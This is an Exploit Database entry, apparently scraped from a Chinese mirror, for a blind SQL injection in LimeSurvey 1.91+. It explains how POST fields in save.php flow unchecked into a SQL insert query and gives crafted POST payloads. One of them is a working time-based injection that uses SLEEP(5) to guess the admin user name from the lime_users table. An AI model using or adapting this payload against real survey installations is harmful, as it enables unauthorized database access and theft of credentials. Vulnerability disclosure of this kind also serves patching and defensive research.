LimeSurvey (PHPSurveyor 1.91+ stable) – Blind SQL Injection

• Exploit Database
• 104 阅读

• 作者： TorTukiTu
  日期： 2012-02-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18508/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102

  # Exploit Title: LimeSurvey Blind SQL injection # Date: 20/02/2012 # Author: TorTukiTu - OpenSphere # Version: 1.91+ build 11804 # Tested on: php   {cke_protected}{C}{cke_protected}{C}   -------------------------------------------------------------------------     # TorTukiTu - Killing Tortoise   #,-"""-. # oo._/ \___/ \ #(____)_/___\__\_) #/_// \\_\ #         # Cookie hacking + Blind SQL Injection     # The vulnerability occurs when a user answers a survey (index.php).   # The session variables can be freely hacked using the following lines in save.php l.82 :   # if (isset($_POST[$pf])) {$_SESSION[$pf] = $_POST[$pf];}   #if (!isset($_POST[$pf])) {$_SESSION[$pf] = "";}   # $pf is user input in the POST variable   # once splitted, SQL request is directly build from those sessions variable by function createinsertquery(),   # if a special Post variable &apos;srid&apos; is set both in the variable   # &apos;fieldnames&apos; and as simple POST variable (query l. 715 save.php).   # The user can realize blind SQL injections with specially crafted POST variables.     # Normal POST variables example:     fieldnames=17165X6X18SQ001%7C17165X6X18SQ002%7C17165X6X18SQ003%7C17165X6X18SQ004%7C17165X6X18SQ005%7C17165X6X18SQ006%7C17165X6X18SQ007%7C17165X6X18other%7C17165X6X26SQ001%7C17165X6X26SQ002%7C17165X6X26SQ003   MULTI17165X6X18=8   tbdisp17...   ...   start_time=1329742665     # Craft POST variables like this :     fieldnames=17165X6X18SQ001%7C17165X6X18SQ002%7C17165X6X18SQ003%7C17165X6X18SQ004%7C17165X6X18SQ005%7C17165X6X18SQ006%7C17165X6X18SQ007%7C17165X6X18other%7C17165X6X26SQ001%7C17165X6X26SQ002%7C17165X6X26SQ003%7C[VALID FIELD ID]<code> = [SQL INJECTION]--%7Csrid   MULTI17165X6X18=8   tbdisp17...   ...   start_time=1329742665   srid=[SOME INTEGER]     #Example : Blind SQL user name guessing :   fieldnames=17165X6X18SQ001%7C17165X6X18SQ002%7C17165X6X18SQ003%7C17165X6X18SQ004%7C17165X6X18SQ005%7C17165X6X18SQ006%7C17165X6X18SQ007%7C17165X6X18other%7C17165X6X26SQ001%7C17165X6X26SQ002%7C17165X6X26SQ003%7C17165X6X18SQ001</code> = NULL WHERE id=6 AND id IN ( SELECT IF ( (SELECT SUBSTRING(users_name,1) FROM lime_users WHERE uid=1) LIKE &apos;a%&apos;, 1, SLEEP(5)))--%7Csrid   MULTI17165X6X18=8   tbdisp17...   ...   start_time=1329742665   srid=42       -------------------------------------------------------------------------